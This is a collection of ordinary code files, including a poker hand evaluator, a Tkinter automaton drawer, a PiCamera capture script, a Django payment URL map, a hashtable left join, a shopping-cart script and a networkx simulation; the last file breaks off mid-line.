\"rank\": pair_rank}\n\n\ndef two_pair(hand):\n s = [n for n, h in hand]\n \n # two pair requires exactly three distinct ranks and no three of a kind\n if three_of_a_kind(hand)[\"result\"] or len(set(s)) != 3:\n return {\"result\": False, \"rank\": -1}\n card_rank = get_hand_rank(hand)\n card_rank.sort(reverse=True)\n \n rank = 0\n pair_set = set()\n for c in card_rank:\n if card_rank.count(c) == 2 and c not in pair_set:\n rank += c\n pair_set.add(c)\n return {\"result\": True, \"rank\": rank}\n\n\ndef three_of_a_kind(hand):\n s = [n for n, h in hand]\n s.sort()\n rank = -1\n status = False\n for i in range(len(s)):\n if s.count(s[i]) >= 3:\n status = True\n rank = get_card_rank(s[i])\n break\n return {\"result\": status, \"rank\": rank}\n\n\ndef full_house(hand):\n hand_rank = get_hand_rank(hand)\n #print(hand_rank)\n hand_rank_set = set(hand_rank)\n rank = 0\n threeofakind_result = three_of_a_kind(hand)\n if threeofakind_result[\"result\"] and len(hand_rank_set) == 2:\n for c in hand_rank_set:\n rank += c\n return {\"result\": True, \"rank\": rank}\n return {\"result\": False, \"rank\": -1}\n\n\ndef flush(hand):\n hand_rank = get_hand_rank(hand)\n s = [h for n, h in hand]\n if len(set(s)) != 1:\n return {\"result\": False, \"rank\": -1}\n return {\"result\": True, \"rank\": max(hand_rank)}\n\n\ndef straight(hand):\n tocheck_straight = ['--23456789TJQKA'.index(n) for n, h in hand]\n tocheck_straight.sort()\n tocheck_straight.reverse()\n if tocheck_straight == [14, 5, 4, 3, 2]:\n tocheck_straight = [5, 4, 3, 2, 1]\n if (max(tocheck_straight) - min(tocheck_straight) == 4) and (len(set(tocheck_straight)) == 5):\n return {\"result\": True, \"rank\": max(tocheck_straight)}\n else:\n return {\"result\": False, \"rank\": -1}\n\n\ndef four_of_a_kind(hand):\n hand_rank = get_hand_rank(hand)\n for i in range(len(hand_rank)):\n if hand_rank.count(hand_rank[i]) == 4:\n return {\"result\": True, \"rank\": hand_rank[i]}\n return {\"result\": False, \"rank\": -1}\n\n\ndef straight_flush(hand):\n straight_result = straight(hand)\n flush_result = flush(hand)\n if straight_result['result'] and flush_result['result']:\n return {\"result\": True, \"rank\": straight_result[\"rank\"]}\n else:\n return {\"result\": False, \"rank\": -1}\n\n\ndef check_hand_rank(hand):\n if royal_straight_flush(hand):\n return {\"rank\": 9, \"score\": -1, \"description\": \"Royal Straight Flush\"}\n is_straight_flush = straight_flush(hand)\n if is_straight_flush[\"result\"]:\n return {\"rank\": 8, \"score\": is_straight_flush[\"rank\"], \"description\": \"Straight Flush\"}\n is_four_of_a_kind = four_of_a_kind(hand)\n if is_four_of_a_kind[\"result\"]:\n return {\"rank\": 7, \"score\": is_four_of_a_kind[\"rank\"], \"description\": \"Four of a Kind\"}\n is_full_house = full_house(hand)\n if is_full_house[\"result\"]:\n return {\"rank\": 6, \"score\": is_full_house[\"rank\"], \"description\": \"Full House\"}\n is_flush = flush(hand)\n if is_flush[\"result\"]:\n return {\"rank\": 5, \"score\": is_flush[\"rank\"], \"description\": \"Flush\"}\n is_straight = straight(hand)\n if is_straight[\"result\"]:\n return {\"rank\": 4, \"score\": is_straight[\"rank\"], \"description\": \"Straight\"}\n is_three_ofa_kind = three_of_a_kind(hand)\n if is_three_ofa_kind[\"result\"]:\n return {\"rank\": 3, \"score\": is_three_ofa_kind[\"rank\"], \"description\": \"Three of a Kind\"}\n is_two_pair = two_pair(hand)\n if is_two_pair[\"result\"]:\n return {\"rank\": 2, \"score\": is_two_pair[\"rank\"], \"description\": \"Two Pair\"}\n is_one_pair = one_pair(hand)\n if is_one_pair[\"result\"]:\n return {\"rank\": 1, \"score\": is_one_pair[\"rank\"], \"description\": \"One Pair\"}\n return {\"rank\": 
0, \"score\": high_card(hand), \"description\": \"High Card\"}\n","sub_path":"game_utils.py","file_name":"game_utils.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"548769600","text":"from tkinter import Tk, Canvas, Frame, BOTH, LAST, W\r\nfrom collections import deque\r\nfrom random import randint\r\nimport re\r\nimport math\r\nimport sys\r\n\r\n#Name: Cesar Santiago\r\n#Course: COP4020\r\n#Project 4\r\n#Date: 03/22/2020\r\n#Description: A program that gives a graphical interpretation of an FSA as described\r\n#\tIn a file input by the user. It will also run an input string through the FSA\r\n#\tand output if that string is a legal part of the language or not.\r\nclass Scene(Frame):\r\n\t#Constructor of the frame and scene to which a GUI will be drawn.\r\n\tdef __init__(self):\r\n\t\tsuper().__init__()\r\n\t\tself.initUI()\r\n\t\r\n\t#The bulk of the program. It initializes a GUI and draws the FSA onto the Frame.\r\n\t#\tAs well as running the string through the FSA to detect if it is in the language.\r\n\tdef initUI(self):\r\n\t\trad = 25 # Constant for the radius of the automata\r\n\t\tscale = 1 # Constant for the scale of the size of the automata\r\n\t\tself.master.title(\"Final State Automata\")\r\n\t\tself.pack(fill=BOTH, expand=1)\r\n\t\t\r\n\t\t#Reading in the files as described in the arguments passed in by the console\r\n\t\tif(len(sys.argv) == 1):\r\n\t\t\tf = open(\"fsa.txt\", \"r\")\r\n\t\t\ttestF = open(\"legal.txt\", \"r\")\r\n\t\telse:\r\n\t\t\tf = open(sys.argv[1], \"r\")\r\n\t\t\ttestF = open(sys.argv[2], \"r\")\r\n\t\t\t\r\n\t\ttestString = testF.read()\r\n\t\ttokens = f.read()\r\n\t\ttestF.close()\r\n\t\tf.close()\r\n\t\ttokenList = re.split(';', tokens) #Split all of the tokens by the delimiter ;\r\n\t\tcanvas = Canvas(self)\r\n\t\t#Creating empty arrays for the Relations and the Automata\r\n\t\tlanguage = []\r\n\t\tautomata = []\r\n\t\tstates = []\r\n\t\tfor tok in tokenList:\r\n\t\t\tprint(tok.strip(' '))\r\n\t\t\r\n\t\tlanguage.append(tokenList[0])\r\n\t\tnumOfA = int(language[0])\r\n\t\t\r\n\t\tcanvas.create_text(350, 10, anchor = W, font = \"Comic\", text = tokenList[1])\r\n\t\t\r\n\t\t#Creates the automata.\r\n\t\tfor num in range(numOfA):\r\n\t\t\tx = 50 * scale\r\n\t\t\ty = 50 * scale\r\n\t\t\tscale += 1\r\n\t\t\tautomata.append(Automata(radius = rad, position = Vector(x, y), canvasInput = canvas, token = str(num)))\r\n\t\t\t\r\n\t\t#Takes the end states input.\r\n\t\tendStates = re.split(',', tokenList[4])\r\n\t\t#Sets the needed automata end states as true\r\n\t\tfor token in endStates:\r\n\t\t\tautomata[int(token)].end = True\r\n\r\n\t\t#Draws the automata.\r\n\t\tfor circles in automata:\r\n\t\t\tcircles.draw()\r\n\t\t\t\r\n\t\tstates = re.split(',', tokenList[2])\r\n\t\trelations = []\r\n\t\tstateCount = 0\r\n\t\tcanvas.create_line(automata[int(tokenList[3])].x - rad * 2, automata[int(tokenList[3])].y + rad * 2,\r\n\t\tautomata[int(tokenList[3])].x - rad * math.cos(math.pi/4), automata[int(tokenList[3])].y + rad * math.sin(math.pi/4), arrow = LAST, smooth = \"true\")\r\n\t\tfor s in states:\r\n\t\t\tlanguage = s.strip('(|)')\r\n\t\t\taStates = re.split(':', language)\r\n\t\t\ttok = aStates[2]\r\n\t\t\tr = Relation(initialVector = automata[int(aStates[0])], finalVector = automata[int(aStates[1])],\r\n\t\t\tcanvasInput = canvas, initialState = int(aStates[0]), finalState = int(aStates[1]), radius = automata[int(aStates[0])].rad, token = 
tok)\r\n\t\t\tr.draw()\r\n\t\t\trelations.append(r)\r\n\t\t\tstateCount += 1\r\n\t\t\r\n\t\ttheString = \"(defun demo()\\n\\t(setq fp (open \\\"\" + sys.argv[2] + \"\\\" :direction :input)) \\n\"\r\n\t\ttheString += \"\\t(setq l (read fp \\\"done\\\")) \\n\\t(princ \\\"processing \\\") \\n\\t(princ l) \\n\\t(fsa l)\\n)\\n(defun fsa(l)\\n\"\r\n\t\ttheString += \"\\t(cond ((null l) \\\"illegal empty string\\\")\\n\\t\\t(t (State0 l))\\n\\t)\\n)\\n\"\r\n\t\r\n\t\tfor c in automata:\r\n\t\t\ttheString += \"(defun State\" + c.tok + \"(l)\\n\\t(cond\\n\"\r\n\t\t\tif(c.end):\r\n\t\t\t\ttheString += \"\\t\\t((null l) \\\"legal state\\\")\\n\"\r\n\t\t\telse:\r\n\t\t\t\ttheString += \"\\t\\t((null l) \\\"illegal state\\\")\\n\"\r\n\t\t\tfor r in relations:\r\n\t\t\t\tprint(\"State: \" + c.tok + \" Transition: \" + str(r.i))\r\n\t\t\t\tif(c.tok == str(r.i)):\r\n\t\t\t\t\ttheString += \"\\t\\t((equal (car l) '\" + r.tok + \") (State\" + str(r.f) + \"(cdr l)))\\n\"\r\n\t\t\ttheString += \"\\t\\t(t \\\"Illegal character in the state\\\")\\n\\t)\\n)\\n\"\r\n\t\t\r\n\t\tprint(theString)\r\n\t\tlispFile = open(\"part2.lsp\", \"w+\")\r\n\t\tlispFile.write(theString)\r\n\t\tlispFile.close()\r\n\t\t\r\n\t\t#Reading the viability of an input string on the FSA\r\n\t\tcurrentA = int(tokenList[3])\r\n\t\tprint(testString)\r\n\t\tended = False\r\n\t\terror = False\r\n\t\tfor letter in testString:\r\n\t\t\tfound = False\r\n\t\t\tfor r in relations:\r\n\t\t\t\tif(letter == r.tok and currentA == r.i):\r\n\t\t\t\t\tcurrentA = r.f\r\n\t\t\t\t\tprint(\"Token: \" + letter + \" goes from: \" + str(r.i) + \" to \" + str(r.f))\r\n\t\t\t\t\tfound = True\r\n\t\t\tif(not found): \r\n\t\t\t\tprint(\"Illegal string.\") #If the string is illegal then output this\r\n\t\t\t\terror = True\r\n\t\t\t\tbreak\r\n\t\tfor tok in endStates:\r\n\t\t\tif(currentA == int(tok) and (not error)):\r\n\t\t\t\tended = True\r\n\t\t\t\tprint(\"Legal string.\") #If the string is legal then output this\r\n\t\t\r\n\t\tcanvas.pack(fill=BOTH, expand=1)\r\n\t\t\r\n'''\r\n(defun stateX(l)\r\n (cond ((null l) \"illegal: state 0 is an accept state\")\r\n\t\t((equal (car l) 'X) (stateX(cdr l)))\r\n\t\t((equal (car l) 'X) (stateY(cdr l)))\r\n\t\t(princ \"accept\\n\")\r\n\t\t(t \"illegal character in State 0\")\r\n )\r\n)\r\n'''\r\n\r\ndef main():\r\n\troot = Tk()\r\n\tex = Scene()\r\n\troot.geometry(\"400x400\")\r\n\troot.mainloop()\r\n\r\n#Vector: A vector class that provides the math needed for this program\r\nclass Vector:\r\n\tdef __init__(self, _x, _y, _t_x = 0, _t_y = 0):\r\n\t\tself.x = _x\r\n\t\tself.y = _y\r\n\t\tself.t_x = _t_x\r\n\t\tself.t_y = _t_y\r\n\t\t\r\n\tdef getMagnitude(self):\r\n\t\tmag = math.sqrt(math.pow(self.x - self.t_x, 2) + math.pow(self.y - self.t_y, 2))\r\n\t\treturn mag\r\n\t\t\r\n\tdef asUnitVector(self):\r\n\t\tx = self.x / self.getMagnitude()\r\n\t\ty = self.y / self.getMagnitude()\r\n\t\treturn Vector(x, y)\r\n\t\r\n\tdef subtract(self, vector):\r\n\t\t# subtract component-wise: x from x, y from y\r\n\t\tnewVector = Vector(self.x - vector.x, self.y - vector.y)\r\n\t\treturn newVector\r\n\r\n#Automata: A single state of the FSA, drawn as a circle labelled with its token\r\nclass Automata:\r\n\tdef __init__(self, radius, position, canvasInput, token = \"1\", isEnd = False):\r\n\t\tself.rad = radius\r\n\t\tself.pos = position\r\n\t\tself.x = position.x\r\n\t\tself.y = position.y\r\n\t\tself.tok = token\r\n\t\tself.end = isEnd\r\n\t\tself.canvas = canvasInput\r\n\t\t\r\n\tdef draw(self):\r\n\t\tif(self.end):\r\n\t\t\tself.rad += 4\r\n\t\t\tself.canvas.create_oval(self.x - self.rad, self.y - self.rad, self.x + self.rad, self.y + 
self.rad, fill=\"White\")\r\n\t\t\tself.rad -= 4\r\n\t\tself.canvas.create_oval(self.x - self.rad, self.y - self.rad, self.x + self.rad, self.y + self.rad, fill=\"White\")\r\n\t\tself.canvas.create_text(self.x - 5, self.y, anchor = W, font = \"Comic\", text = self.tok)\r\n\r\n#Relation: A relation between one Automata class to another.\r\nclass Relation:\r\n\tdef __init__(self, initialVector, finalVector, initialState, finalState, canvasInput, radius, token):\r\n\t\tself.rad = radius\r\n\t\tself.i = initialState\r\n\t\tself.f = finalState\r\n\t\tself.vector = Vector(initialVector.x, initialVector.y, finalVector.x, finalVector.y)\r\n\t\tself.canvas = canvasInput\r\n\t\tself.tok = token\r\n\t\r\n\tdef draw(self):\r\n\t\tif(self.i == self.f):\r\n\t\t\t#Create a line going from the side of the Automata to the top with an arc of diameter\r\n\t\t\tself.canvas.create_line(self.vector.x + self.rad, self.vector.y,\r\n\t\t\tself.vector.x + self.rad * 2, self.vector.y - self.rad * 2,\r\n\t\t\tself.vector.t_x, self.vector.t_y - self.rad, \r\n\t\t\tarrow = LAST, smooth = \"true\")\r\n\t\t\t#Draw the token of the state change on a point of the previous line\r\n\t\t\tself.canvas.create_text(self.vector.x + self.rad + 10, self.vector.y - self.rad - 10, anchor = W, font = \"Comic\", text = self.tok)\r\n\t\t\t\r\n\t\telif(self.vector.getMagnitude() > 75):\r\n\t\t\t#Create a line from the left of an Automata to the other with an arc the lentgth of the radius times three\r\n\t\t\tself.canvas.create_line(self.vector.x - self.rad * math.cos(math.pi/4), self.vector.y + self.rad * math.sin(math.pi/4),\r\n\t\t\t(self.vector.x + self.vector.t_x) / 2 - self.rad * 3, (self.vector.y + self.vector.t_y) / 2 + self.rad * 3,\r\n\t\t\tself.vector.t_x - self.rad * math.cos(math.pi/4), self.vector.t_y + self.rad * math.sin(math.pi/4), arrow = LAST, smooth = \"true\")\r\n\t\t\t#Draw the token of the state change on the focus point of that line\r\n\t\t\tself.canvas.create_text((self.vector.x + self.vector.t_x) / 2 - self.rad * 3, (self.vector.y + self.vector.t_y) / 2 + self.rad * 3,\r\n\t\t\tanchor = W, font = \"Comic\", text = self.tok)\r\n\t\t\t\r\n\t\telse:\r\n\t\t\t#Create a straight diagonal line from one Automata to the other\r\n\t\t\tself.canvas.create_line(self.vector.x + self.rad * math.cos(math.pi/4), self.vector.y + self.rad * math.sin(math.pi/4),\r\n\t\t\tself.vector.t_x - self.rad * math.cos(math.pi/4), self.vector.t_y - self.rad * math.sin(math.pi/4), arrow = LAST, smooth = \"true\")\r\n\t\t\t#Draw the token of the state adgacent to the line\r\n\t\t\tself.canvas.create_text(self.vector.x + self.rad - 15, self.vector.x + self.rad + 5, anchor = W, font = \"Comic\", text = self.tok)\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n\t\r\n\t","sub_path":"COP4020/projects/santiagoc/fsa.py","file_name":"fsa.py","file_ext":"py","file_size_in_byte":8512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"286637215","text":"#! 
/usr/bin/python3\n# Yasushiu Honda 2021 9/8\n# Capture frames from PiCamera and record them to /tmp \n\nimport cv2\nimport time\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport modules.keyin as keyin\n\nclass PI_CAMERA():\n def __init__(self,width,height):\n \n # Camera resolution, e.g. 640x480, 320x240\n self.RES_X=int( width )\n self.RES_Y=int( height )\n \n # initialize the camera and grab a reference to the raw camera capture\n # create the camera access object\n self.cam = PiCamera()\n self.cam.framerate = 30 # frame rate\n self.cam.brightness = 60 # brightness\n #cam.saturation = 50\n\n self.cam.awb_mode='auto'\n #list_awb = ['off', 'auto', 'sunlight', 'cloudy', 'shade']\n self.cam.iso=200\n self.cam.shutter_speed=1000000\n self.cam.exposure_mode = 'auto' # off, auto, fixedfps\n time.sleep(1)\n self.g = self.cam.awb_gains\n self.cam.awb_mode = 'off'\n self.cam.awb_gains = self.g\n\n self.cam.resolution = (self.RES_X, self.RES_Y)\n self.cam.rotation=0\n self.cam.meter_mode = 'average' # average, spot, backlit, matrix\n self.cam.exposure_compensation = 0\n self.rawCapture = PiRGBArray(self.cam, size=(self.RES_X, self.RES_Y))\n\n self.rawCapture.truncate(0) # clear the stream for next frame\n\n def capture(self):\n tmp = self.cam.capture_continuous(self.rawCapture, format=\"bgr\", use_video_port=True)\n cap = next(tmp)\n frame = cap.array\n\n self.rawCapture.truncate(0) # clear the stream for next frame\n\n return frame\n\n\nif __name__ == \"__main__\":\n # For recording\n record='n' # if you want to record a movie, select 'y' \n # and its FPS drops to 10Hz.\n # if you select 'n' FPS is 30Hz without recording.\n OUT_FILE=\"/tmp/output.mp4\"\n\n PERIOD=0.2 # Indication period\n\n\n print(\"# Captured movie is written in %s .\" % OUT_FILE)\n fmt = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n record_fps=10\n width=320\n height=320\n print(\"# Resolution: %5d x %5d\" % (width,height))\n size = (width, height)\n vw = cv2.VideoWriter(OUT_FILE, fmt, record_fps, size)\n\n cam = PI_CAMERA(width,height)\n\n key=keyin.Keyboard()\n ch='c'\n\n now=time.time()\n start=now\n init=now\n count=0\n print(\"# To stop, input 'q' in this terminal.\")\n while ch!='q':\n now=time.time()\n count+=1 \n if now-init>PERIOD:\n print(\"\\r time: %8.2f; rate:%6.2f\" % (now-start,count/PERIOD), end='')\n count=0\n init=now \n\n ch=key.read()\n try: \n frame = cam.capture()\n cv2.imshow(\"Front View\", frame)\n cv2.waitKey(1)\n\n if record=='y':\n vw.write(frame)\n\n except KeyboardInterrupt:\n print(\"ctrl + C \")\n cv2.destroyAllWindows()\n vw.release()\n\n cv2.destroyAllWindows()\n vw.release()\n print(\"\\n # Bye-bye \\n\")\n","sub_path":"picam.py","file_name":"picam.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"634902271","text":"# Remove every second element of an array \n\n# Easiest Option \ndef rem_second(arr):\n return arr[::2]\n\n\ndef remove_second(arr):\n new_arr= []\n for i, j in enumerate(arr):\n if i % 2 == 0:\n new_arr.append(j)\n return (new_arr)\n \nprint(remove_second([\"hi\", \"bye\",\"hello\",\"goodbye\"])) # \"hi\" \"hello\"\nprint(remove_second([1,2,3,4,5,6])) # 1,3,5","sub_path":"Extra_Practice/remove_second_element.py","file_name":"remove_second_element.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"224674620","text":"from typing import List\n\nimport ipywidgets.widgets as widgets\nfrom 
IPython.core.display import display, Javascript\n\nfrom labext.modules import JQuery, Selectize, MiscFunc\nfrom labext.widget import WidgetWrapper\n\n\nclass Selection(WidgetWrapper):\n\n def __init__(self, *args, **kwargs):\n self._widget = widgets.Select(*args, **kwargs)\n self.unique_class_id = f\"IJ_selection_{self._widget.model_id}\"\n self._widget.add_class(self.unique_class_id)\n\n @property\n def widget(self):\n return self._widget\n\n @staticmethod\n def required_modules():\n return [JQuery, Selectize, MiscFunc]\n\n def sync(self, fix_overflow: bool = True):\n jscode = f\"\"\"\nrequire([\"{JQuery.id()}\", \"{Selectize.id()}\"], function ($, _) {{\n {MiscFunc.call_until_return_true}(function () {{\n // get the selection container\n var $el = $(\".{self.unique_class_id}\");\n if ($('select', $el).length == 0) {{\n return false;\n }}\n\n // make it looks beautiful\n $('select', $el).selectize();\n $('.selectize-control', $el).width('100%');\n \n if ({\"true\" if fix_overflow else \"false\"}) {{\n var $p = $el.parent();\n for (var i = 0; i < 64; i++) {{\n $p.css('overflow', 'inherit');\n if ($p.hasClass('jp-OutputArea') && $p.hasClass('jp-Cell-outputArea')) {{\n break;\n }}\n $p = $p.parent();\n }}\n }}\n\n return true;\n }}, 100);\n}}\n\"\"\"\n display(Javascript(jscode))\n\n\nclass RecordedSelection:\n \"\"\"\n Key is the key that we want to select the value\n Value is the value that we are going to select\n \"\"\"\n\n def __init__(self, recorded_data: dict, key: str, options: List[str], label):\n self.recorded_data = recorded_data\n self.options = options\n self.key = key\n self.widget = Selection(\n options=[(x, i) for i, x in enumerate(options)],\n value=self.recorded_data.get(self.key, 0),\n description=label,\n disabled=False,\n )\n self.widget.widget.observe(self.update, names='value')\n\n def update(self, change):\n self.recorded_data[self.key] = change['new']\n\n def set_key(self, key):\n self.key = key\n return self\n\n def sync_value(self):\n self.widget.value = self.recorded_data.get(self.key, 0)\n return self\n","sub_path":"labext/widgets/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"586817454","text":"\"\"\"pters URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.PaymentView.as_view(), name='index'),\n # Subscription purchase history page\n url(r'^payment_history/$', views.PaymentHistoryView.as_view(), name='payment_history'),\n\n # Payment handling ##########################################################################################################\n # Pre-payment validation\n url(r'^check_before_billing/$', views.check_before_billing_logic, name='check_before_billing'),\n\n # Page that verifies completion at payment time\n url(r'^check_finish_billing/$', views.check_finish_billing_logic, name='check_finish_billing'),\n # Page called when iamport posts back the payment result\n url(r'^billing_check/$', views.billing_check_logic, name='billing_check'),\n\n\n # Recurring payment changes ######################################################################################################\n # Recurring payment cancellation page\n url(r'^cancel_period_billing/$', views.cancel_period_billing_logic, name='cancel_period_billing'),\n\n # Recurring payment restart page\n url(r'^restart_period_billing/$', views.restart_period_billing_logic, name='restart_period_billing'),\n # Page that lifts a paused recurring payment\n url(r'^clear_pause_period_billing/$', views.clear_pause_period_billing_logic,\n name='clear_pause_period_billing'),\n # Recurring payment card deletion page\n url(r'^delete_period_billing/$', views.delete_period_billing_logic,\n name='delete_period_billing'),\n\n # Page that checks a recurring payment method change\n url(r'^check_update_period_billing/$', views.check_update_period_billing_logic, name='check_update_period_billing'),\n # Recurring payment method change page\n url(r'^update_period_billing/$', views.update_period_billing_logic, name='update_period_billing'),\n\n\n # Under development ################################################################################\n # Change the subscription on a recurring payment\n url(r'^update_payment_product_info/$', views.update_payment_product_info_logic, name='update_payment_product_info'),\n # Reserve a subscription change on a recurring payment\n url(r'^update_reserve_product_info/$', views.update_reserve_product_info_logic, name='update_reserve_product_info'),\n ########################################################################################################\n\n\n # Payment info lookup ######################################################################################################\n # Fetch the scheduled (upcoming) payment info\n url(r'^get_payment_schedule_info/$', views.GetPaymentScheduleInfoView.as_view(), name='get_payment_schedule_info'),\n\n # Fetch the payment currently in use (also reports whether it is recurring)\n url(r'^get_payment_info/$', views.GetPaymentInfoView.as_view(), name='get_payment_info'),\n\n # Fetch the recurring payment currently in progress\n url(r'^get_billing_info/$', views.GetBillingInfoView.as_view(), name='get_billing_info'),\n\n # List payment records\n url(r'^get_payment_list/$', views.GetPaymentListView.as_view(), name='get_payment_list'),\n\n # Fetch product info\n url(r'^get_product_info/$', views.GetProductInfoView.as_view(), name='get_product_info'),\n\n\n # Coupon features\n url(r'^get_coupon_product_info/$', views.GetCouponProductInfoView.as_view(), name='get_coupon_product_info'),\n url(r'^payment_for_coupon/$', views.payment_for_coupon_logic, name='payment_for_coupon'),\n\n\n # Currently unused ########################################################################################################\n url(r'^delete_billing_info/$', views.delete_billing_info_logic, name='delete_billing_info'),\n # Payment page\n url(r'^resend_period_billing/$', views.resend_period_billing_logic, name='resend_period_billing'),\n # Payment complete page\n url(r'^payment_complete/$', views.PaymentCompleteView.as_view(), name='payment_complete'),\n\n url(r'^payment_for_iap/$', views.payment_for_iap_logic, name='payment_for_iap'),\n url(r'^payment_for_ios/$', 
views.payment_for_ios_logic, name='payment_for_ios'),\n\n url(r'^ios_receipt_validation/$', views.ios_receipt_validation_logic, name='ios_receipt_validation'),\n\n\n # Coupon related features\n url(r'^add_member_coupon/$', views.add_member_coupon_logic, name='add_member_coupon'),\n url(r'^get_member_coupon_list/$', views.GetMemberCouponListView.as_view(), name='get_member_coupon_list'),\n url(r'^add_coupon_product_info/$', views.add_coupon_product_info_logic, name='add_coupon_product_info')\n ###################################################################################################################\n]\n","sub_path":"pters_project/payment/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"291166336","text":"import optparse\nfrom src.ftp_server import FTPHandler\nimport socketserver\nfrom conf import settings\n\nclass ArgvHandler(object):\n def __init__(self):\n self.parser = optparse.OptionParser()\n (options,args) = self.parser.parse_args()\n\n self.verify_args(options, args)\n\n def verify_args(self,options,args):\n # Check the arguments and dispatch the matching action\n if hasattr(self,args[0]):\n func = getattr(self,args[0])\n func()\n else:\n self.parser.print_help()\n\n def start(self):\n print('Starting server')\n\n server = socketserver.ThreadingTCPServer((settings.HOST,settings.PORT),FTPHandler)\n server.serve_forever()\n # self.parser = optparse.OptionParser()\n # (options, args) = self.parser.parse_args()\n # self.verify_args(options, args)\n\n\n\n\n","sub_path":"all/day8-homework/server/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"352541429","text":"from hashtable import HashTable\nfrom linkedlist import LinkedList\n\n\ndef left_join_tables(hashtable1, hashtable2):\n \"\"\"This function takes in 2 hashtables and returns an array after\n combining both data structures using the left join method.\n \"\"\"\n hashtable3 = HashTable(11)\n ht1_keys = []\n ht3_data = []\n\n for item in hashtable1._buckets:\n if item:\n ht1_keys.append(item.get_keys())\n \n for bucket in ht1_keys:\n for key in bucket:\n value1 = hashtable1.get(key)\n value2 = None\n if hashtable2.contains(key):\n value2 = hashtable2.get(key)\n hashtable3.add(key, value1, value2)\n else:\n hashtable3.add(key, value1)\n \n ht3_data.append((key, value1, value2))\n \n for item in hashtable3._buckets:\n if item:\n item.display()\n \n return ht3_data\n\n\nhashtable = HashTable(11)\nhashtable.add('Chuck', 'one')\nhashtable.add('Laura', 'two')\nhashtable.add('Alex', 'three')\nhashtable.add('Ben', 'four')\nhashtable.add('Maddie', 'five')\n\nhashtable2 = HashTable(11)\nhashtable2.add('Ben', '4')\nhashtable2.add('Alex', '3')\nhashtable2.add('Mary', '6')\nhashtable2.add('Alfred', '7')\nhashtable2.add('Laura', '2')\nhashtable2.add('Chuck','1')\n\n\ndata = left_join_tables(hashtable, hashtable2)\n","sub_path":"python/challenges/left_join/left_join.py","file_name":"left_join.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"382038194","text":"# coding:utf-8\n\n'''\nProblem 1:\n1. Ask the user to enter an amount of money\n2. Let the user pick goods to add to a shopping cart\n3. When finished, the user enters N to check out or Q to quit\n4. At checkout, if the total exceeds the entered amount, report 'insufficient balance'\nBe as detailed as possible\n\nProblem 2: predict the value printed below\nprint(1.2-1.0==0.2)\n'''\n\ngoods = [\n {\"name\": \"yacht\", \"price\": \"2000\"},\n {\"name\": \"keyboard\", \"price\": \"100\"},\n {\"name\": \"mouse\", 
\"price\": \"80\"},\n {\"name\": \"美女\", \"price\": \"500\"},\n {\"name\": \"鸡蛋\", \"price\": \"5\"},\n]\n\n\nclass ShoppingCart():\n add_list = {} # 购买的商品列表 。key==索引。value == 商品的数量\n add_money = 0 # 购买需要的钱\n\n def input_money(self):\n # 判断输入余额是否符合要求\n money = input(\"请输入您的余额(整数即可):\")\n if money.isdigit() and 0 < int(money):\n return money\n else:\n print(\"请输入正确格式的余额\")\n self.input_money()\n\n def add_goods(self, money):\n for el in range(len(goods)):\n print(el+1, goods[el]['name'], goods[el]['price'])\n while 1:\n choose = input(\"请选择您要购买的编号(输入N结算,输入Q退出):\")\n if choose.isdigit() and 0 < int(choose) <= len(goods): # 用户输入的编号正常\n list_index = int(choose) - 1 # 通过用户输入的编号来获得goods的索引\n if self.add_list.get(list_index) == None:\n self.add_list[list_index] = 1\n print(self.add_list)\n else:\n self.add_list[list_index] = self.add_list[list_index] + 1\n print(self.add_list)\n # 把用户选择的商品加入到购物车\n elif choose.upper() == 'Q':\n break\n elif choose.upper() == 'N':\n for f in self.add_list:\n self.add_money = self.add_money + int(self.add_list[f]) * int(goods[f]['price'])\n print(\"预计花费%s\" % self.add_money)\n if int(money) - int(self.add_money) >= 0:\n rest_mone = int(money) - int(self.add_money)\n print(\"您的余额充足。目前剩余可用余额为%s:\" % rest_mone)\n elif int(money) - int(self.add_money) < 0:\n rest_mone = int(self.add_money)-int(money)\n print(\"对不起。您的余额不足。缺少%s元。请充值\" % rest_mone)\n else:\n print(\"出现了某种未知情况\")\n break\n else:\n print(\"您输入的编号有误,请重新输入!\")\n continue\n\n\n\na = ShoppingCart()\nb = a.input_money()\na.add_goods(b)","sub_path":"购物车.py","file_name":"购物车.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"391747717","text":"from __future__ import division\nimport numpy as np\nimport networkx as nx\nfrom multicity import mult\nimport matplotlib.pyplot as plt\n\nbarabasi = nx.barabasi_albert_graph(100, 5, seed=None)\nG=nx.adjacency_matrix(barabasi)\nArrivalTime = []\nfor i in range(30):\n DAT = mult(G)\n ArrivalTime.append(DAT)\nAverageArrival = 